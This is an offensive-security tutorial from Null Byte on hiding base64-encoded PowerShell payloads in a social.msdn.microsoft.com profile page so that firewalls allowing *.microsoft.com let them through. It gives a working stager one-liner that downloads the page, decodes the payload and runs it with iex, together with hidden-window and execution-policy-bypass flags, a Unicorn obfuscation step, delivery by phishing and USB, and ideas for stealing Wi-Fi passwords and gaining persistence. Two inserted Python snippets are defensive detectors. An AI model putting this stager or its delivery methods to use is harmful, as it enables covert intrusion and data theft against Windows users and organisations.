
Using Microsoft.com Domains to Bypass Firewalls and Run Payloads « Null Byte :: WonderHowTo



Microsoft.com is one of the largest domains on the Internet, with thousands of registered subdomains. Windows 10 contacts these subdomains hundreds of times per hour, which makes it difficult to protect and monitor every request the operating system needs through a firewall. An attacker could use these subdomains to host payloads and evade network firewalls.

While I was recently trying to share an article on social media, I could not enter a simple PowerShell command into the tweet window. Twitter kept returning an error message stating that the tweet could not be sent.

In the past, hackers had tweeted PowerShell commands with the intent of using the service as a payload-hosting system. This concept is not new, and it led me to think about other popular domains that could be used in a similar way, as well as the potential benefits such activity might have for an attacker.

Why use Microsoft domains instead of a dedicated VPS?

The most significant benefit would probably be the way these popular domains are treated by network firewalls in high-security environments.

The concept is relatively simple. An attacker hosts the payload on a Microsoft domain. When a Windows 10 computer attempts to download it, the web request is more likely to traverse the network unhindered, passing the firewall and any organization-deployed Intrusion Detection System (IDS), even on hardened operating systems and networks.

Windows 10 computers can call home "up to tens of thousands of times a day". Even with hardened settings, Windows 10 contacts Microsoft servers thousands of times. Some of the data transferred to and from Microsoft domains is required to maintain system updates and other important aspects of the operating system. Below is an example Wireshark capture of the GET requests leaving a Windows 10 system.

Some Microsoft domains appear with unusual subdomains (for example, "geover.prod.do.dsp.mp.microsoft.com"). These are typically dedicated to services, resources, and applications that run in the background, which means that some strict firewalls and IDS deployments use wildcard rules (for example, *.microsoft.com) to let this traffic pass through the network. Some system administrators may also ignore Microsoft domains entirely, because malicious actors do not abuse them very often.

An attacker can use this knowledge to their advantage. Take the following Wireshark image as an example: do you notice anything unusual?

The domain "social.msdn.microsoft.com" was used only to download the attacker's payload. To the naked eye, or to someone performing Deep Packet Inspection (DPI), this traffic looks mostly harmless. The domain is part of the Microsoft community forum for developers and everyday Windows 10 users. The requests (TCP/TLS) are encrypted, so further inspection of the packets does not reveal the full path on the website or its contents (i.e., the payload). Administrators watching this traffic on the network would probably believe the target user is browsing the Microsoft forum.

When you navigate to the page set up by the attacker, you'll see the payload embedded in the About Me section.

Many types of Microsoft domains can be used for this kind of activity; these include Microsoft Answers, Office Forms, OneDrive, and even the comment sections of other Microsoft news sites. All of these legitimate Microsoft domains accept user input that can be abused to host payloads.
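The wildcard rule described above is the weak point on the network side. As an added example that is not from the article, the following Python compares a "*.microsoft.com" allow rule with an explicit allow-list built from the endpoints a fleet is known to need; the host names are the ones the article mentions, while the KNOWN_GOOD set and the log lines are constructed for illustration.

```python
"""Compare the wildcard '*.microsoft.com' allow rule with an explicit allow-list
of the Microsoft endpoints a fleet is known to need. Added example, not from the
article; hosts are from the article, KNOWN_GOOD and the log lines are constructed."""
import re

# Baseline endpoints observed in routine Windows 10 traffic (the article's capture
# shows hosts such as geover.prod.do.dsp.mp.microsoft.com). Constructed for the
# example; a real list comes from baselining your own fleet.
KNOWN_GOOD = {"geover.prod.do.dsp.mp.microsoft.com", "www.microsoft.com"}

def matches_wildcard(host, pattern):
    """'*.example.com' matches subdomains on a label boundary, not the apex
    and not look-alikes such as evilexample.com or example.com.attacker.net."""
    host = host.lower().rstrip(".")
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])
    return host == pattern

def wildcard_policy(sni):
    """The rule the article says strict firewalls tend to use."""
    return "allow" if matches_wildcard(sni, "*.microsoft.com") else "inspect"

def explicit_policy(sni):
    """Allow only baselined endpoints; other Microsoft hosts (where user-generated
    content such as a profile page lives) are passed but queued for review."""
    if sni in KNOWN_GOOD:
        return "allow"
    if matches_wildcard(sni, "*.microsoft.com"):
        return "review"
    return "inspect"

# Constructed TLS session log. The path is encrypted, as the article notes, but the
# SNI (server name) is sent in the clear and is enough to tell these hosts apart.
LOG = """\
2019-05-01T10:00:01 src=10.0.0.12 sni=geover.prod.do.dsp.mp.microsoft.com bytes=842
2019-05-01T10:00:07 src=10.0.0.12 sni=www.microsoft.com bytes=1523
2019-05-01T10:00:09 src=10.0.0.12 sni=social.msdn.microsoft.com bytes=61410
2019-05-01T10:00:11 src=10.0.0.12 sni=microsoft.com.example.net bytes=3300
"""
LINE = re.compile(r"src=(?P<src>\S+) sni=(?P<sni>\S+) bytes=(?P<bytes>\d+)")

def evaluate(log, policy):
    """Return {sni: decision} for every session in the log under the given policy."""
    decisions = {}
    for line in log.splitlines():
        m = LINE.search(line)
        if m:
            decisions[m["sni"]] = policy(m["sni"])
    return decisions

def review_queue(log):
    """Hosts the explicit policy surfaces that the wildcard rule lets through silently."""
    explicit, wildcard = evaluate(log, explicit_policy), evaluate(log, wildcard_policy)
    return sorted(h for h, d in explicit.items() if d == "review" and wildcard[h] == "allow")
```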

Step 1: Create the payload

Here we define the final code that will be executed on the target's computer. To keep things simple, the payload creates an empty text file named pwn_sauce in the Documents folder. Note the triple backslash (\\\). In Bash (the Kali terminal), this is required to pass the PowerShell variable in the payload as a literal string.

  powershell -ep bypass /w 1 /C New-Item -ItemType File 'C:\Users\\\$env:USERNAME\Documents\pwn_sauce'

PowerShell is started with the execution policy set to Bypass (-ep bypass), while the terminal window stays hidden with /w 1. A new file is created with the New-Item cmdlet. The file path uses the USERNAME environment variable, so the affected user's name is inserted automatically and the command runs on any Windows 10 computer without modification. The new file is created in the "Documents" folder.

Simple commands like the one in the screenshot above can be embedded directly in the About Me section. Complex PowerShell payloads that contain special characters must be base64-encoded; otherwise the Microsoft server will detect and sanitize the special characters (for example, < > &). Encoding the payload is the quickest way around this problem, and it can be done in Kali Linux with the following command. printf passes the payload through a pipe (|) to the base64 command, and the encoded output appears below it.

  ~# printf '%s' "PAYLOAD GOES HERE" | base64

cG93ZXJzaGVsbCAtZXAgYnlwYXNzIC93IDEgL0MgTmV3LUl0ZW0gLUl0ZW1UeXBlIGZpbGUgJ0M6
XFVzZXJzXCRlbnY6VVNFUk5BTUVcRG9jdW1lbnRzXHB3bl9zYXVjZSc=

With longer commands, base64 will likely produce multiple encoded lines. When PowerShell consumes a base64 string, it must be on a single line. Concatenate the lines into a single string by piping the base64 output to tr, which deletes (-d) the newline characters (\n).

  ~# printf '%s' "PAYLOAD GOES HERE" | base64 | tr -d '\n'

cG93ZXJzaGVsbCAtZXAgYnlwYXNzIC93IDEgL0MgTmV3LUl0ZW0gLUl0ZW1UeXBlIGZpbGUgJ0M6XFVzZXJzXCRlbnY6VVNFUk5BTUVcRG9jdW1lbnRzXHB3bl9zYXVjZSc=

That is the encoded payload. Let's continue by creating the Microsoft account and setting up the stager.

Step 2: Create a Microsoft Account

A Microsoft account is required to create and modify the profile page where the payload will be hosted. Navigate to the Microsoft Live login page to start the process.

After logging in, navigate to the user profile page at https://social.msdn.microsoft.com/Profile/USERNAME and click the "Edit My Profile" button to edit the About Me section.

Step 3: Host the Payload on the Microsoft Web Site

The About Me section of the Microsoft profile page can hold 1,024 characters. Keep this in mind when creating the payload, especially when base64-encoding it, since encoding increases the number of characters. It would be possible to host the payload in plain text, but the stager would then need code to detect HTML-escaped strings and convert them back to plain text. That is possible in PowerShell but beyond the scope of this article.

Add the desired payload to the About Me section between the words START and END. In the next step, the stager will parse all of the HTML on the Microsoft page and look for the encoded string between the "START" and "END" markers.

When done, click the "Save" button at the bottom of the page.

Step 4: Create the Stager

The following PowerShell one-liner was developed to download the Microsoft user's profile page, then extract, decode, and execute the encoded payload.

  $wro = iwr -Uri https://social.msdn.microsoft.com/Profile/USERNAME -UseBasicParsing; $r = [Regex]::new("(?<=START)(.*)(?=END)"); $m = $r.Match($wro.rawcontent); if ($m.Success) { $p = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($m.value)); iex $p }

The one-liner consists of several commands separated by semicolons. I will break down each command below.

  $wro = iwr -Uri https://social.msdn.microsoft.com/Profile/USERNAME -UseBasicParsing;

Above: The Invoke-WebRequest (iwr) cmdlet retrieves the web page, and the result is stored in the variable $wro (a WebResponseObject). The -UseBasicParsing parameter, although deprecated, enables basic parsing. I've noticed that this parameter must be set explicitly for the request to succeed.

  $r = [Regex]::new("(?<=START)(.*)(?=END)");

Above: PowerShell uses a regex pattern to locate the payload in the HTML. There are other ways to extract content from web pages with PowerShell, but this method has proven to be universal. A payload embedded between START and END is matched by this pattern.

  $m = $r.Match($wro.rawcontent);

Above: Stores the text that matches the regex pattern in the variable $m.

  if ($m.Success) { $p = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($m.value)); ... }

Above: If the pattern was found ($m.Success), decode the matched string (FromBase64String) and store the result in the variable $p.

  iex $p

Above: Invoke-Expression (iex) executes the contents of the variable $p, which in this case is the PowerShell payload. For testing, iex can be replaced with echo (see below).
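The chain just described (web download, base64 decode, Invoke-Expression) is exactly what PowerShell Script Block Logging (Event ID 4104) records on the endpoint. As an added example that is not part of the article, this Python flags that chain in constructed 4104 records and decodes any embedded base64 literal so an analyst sees the payload in clear; the sample records reuse the article's own stager and encoded payload, and the thresholds are assumptions for illustration.

```python
"""Flag the download -> base64-decode -> Invoke-Expression stager chain in
PowerShell Script Block Logging (Event ID 4104) records. Added example, not from
the article; the log records below are constructed from the article's one-liners."""
import base64
import re

# Each indicator alone is common in admin scripts; the combination is the signal.
DOWNLOAD = re.compile(r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString)\b", re.I)
DECODE = re.compile(r"FromBase64String", re.I)
EXECUTE = re.compile(r"(?:^|[\s;{(])(?:iex|Invoke-Expression)\b", re.I)
MARKERS = re.compile(r"\(\?<=START\)|\(\?=END\)")  # the article's START/END lookaround regex
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")

def decode_literal(script_block):
    """Decode the first long base64 literal for the analyst, or return None.
    -EncodedCommand style blobs are UTF-16LE, so fall back to that on NUL bytes."""
    m = B64_LITERAL.search(script_block)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:
        return None
    return raw.decode("utf-16-le" if b"\x00" in raw else "utf-8", errors="replace")

def classify(script_block):
    hits = {
        "download": bool(DOWNLOAD.search(script_block)),
        "base64_decode": bool(DECODE.search(script_block)),
        "invoke_expression": bool(EXECUTE.search(script_block)),
        "start_end_markers": bool(MARKERS.search(script_block)),
    }
    # Decoding base64 straight into Invoke-Expression is the core of the stager;
    # a web download or the START/END regex in the same block raises confidence.
    return {
        "suspicious": hits["base64_decode"] and hits["invoke_expression"],
        "confidence": sum(hits.values()),
        "decoded": decode_literal(script_block),
        "indicators": hits,
    }

# Constructed ScriptBlockText samples: the article's stager, a benign admin
# one-liner, and a direct decode-and-run of the article's encoded payload.
SAMPLES = [
    r'$wro = iwr -Uri https://social.msdn.microsoft.com/Profile/USERNAME -UseBasicParsing; $r = [Regex]::new("(?<=START)(.*)(?=END)"); $m = $r.Match($wro.rawcontent); if ($m.Success) { $p = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($m.value)); iex $p }',
    r"Get-ChildItem C:\Users | Select-Object Name, LastWriteTime",
    "$p = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZXAgYnlwYXNzIC93IDEgL0MgTmV3LUl0ZW0gLUl0ZW1UeXBlIGZpbGUgJ0M6XFVzZXJzXCRlbnY6VVNFUk5BTUVcRG9jdW1lbnRzXHB3bl9zYXVjZSc=')); iex $p",
]

def suspicious_samples():
    """Indices of SAMPLES that trigger, for a quick stand-alone run."""
    return [i for i, s in enumerate(SAMPLES) if classify(s)["suspicious"]]
```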

Step 5: Obfuscate the PowerShell Stager (Optional)

An attacker may want to obfuscate the stager with a tool such as Unicorn. For more information about Unicorn, see the section on creating an undetectable payload on the tool's GitHub page.

  ~# python unicorn.py stager.ps1


Written by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)
Twitter: @TrustedSec, @HackingDave

[*] Exported Powershell output code in powershell_attack.txt 

Then cat the file "powershell_attack.txt" to view the obfuscated stager.

  ~# cat powershell_attack.txt

Step 6: Deliver the Stager

The stager presented here was developed for and tested with a USB Rubber Ducky. However, there are many other ways to run the code on the target computer. The following is a non-exhaustive list of possible attack vectors.

  • Man-in-the-Middle: Tools like MITMf (now deprecated) and Bettercap can intercept downloads and replace them with malicious files.
  • Email Attachment: Phishing is one of the most common ways an attacker tries to compromise an organization. Some organizations are too big to give all of their staff thorough security awareness training, which keeps this technique effective.
  • USB Dead Drop: USB drops have a success rate of almost 50%. Many people can be fooled into inserting a random USB flash drive into their computer.
  • USB Rubber Ducky: With a USB Rubber Ducky, the stager can be delivered with only a few seconds of physical access to the target computer.

Step 7: Improve the Attack (Conclusion)

An attacker can do much more to improve this attack.

Abusing Google.com to Host the Payload:

Using Google.com to host payloads would be an improvement to the attack. As with *.microsoft.com, most firewalls do not block GET requests sent directly to google.com.

Hosting a payload directly on Google is more difficult. Google is a search engine, so the attacker would need to abuse it by creating a website that Google indexes, then create a URL path on that site containing the payload as the file name. The payload would then be retrieved by identifying the href in the search results rather than the body of an About Me section (example below). The target's computer would never query the attacker's website; the payload would be retrieved entirely through the Google search engine.

Post-Exploitation Payloads:

This article used a very simple PowerShell payload that creates an empty text file in the Documents folder. Realistically, an attacker could attempt to exfiltrate Wi-Fi passwords, establish persistence using tools such as schtasks, or place an EXE file in the Startup folder.

However, if data has to leave the network, it will likely do so over a generic TCP reverse shell, which undermines the purpose of using a Microsoft or Google domain in the stager. In that case it may be preferable to turn the target computer into a Wi-Fi hotspot and create an SMB share. Such an attack would let the attacker connect to the target's Wi-Fi hotspot (bypassing the source network entirely) and plunder files on the computer.

SmartScreen Evasion:

SmartScreen is an additional layer of security developed by Microsoft. It runs in the background as an anti-malware service, scanning applications and files against a Microsoft malware database.

In my short round of testing (without Unicorn obfuscation), a compiled PowerShell stager (EXE) bypassed the Chrome browser, Windows Defender, and Avast Antivirus on a lightly hardened Windows 10 computer. SmartScreen, on the other hand, prompted the user to manually allow the EXE because it came from an "unknown publisher" (i.e., the attacker). This article is about bypassing network firewalls, so signing executables and bypassing SmartScreen will be covered in a future article.

Follow me on Twitter @tokyoneon_, where I will probably release more detection-evasion code. Please leave a comment if you have any questions.


Cover photo and screenshots by tokyoneon/Null Byte
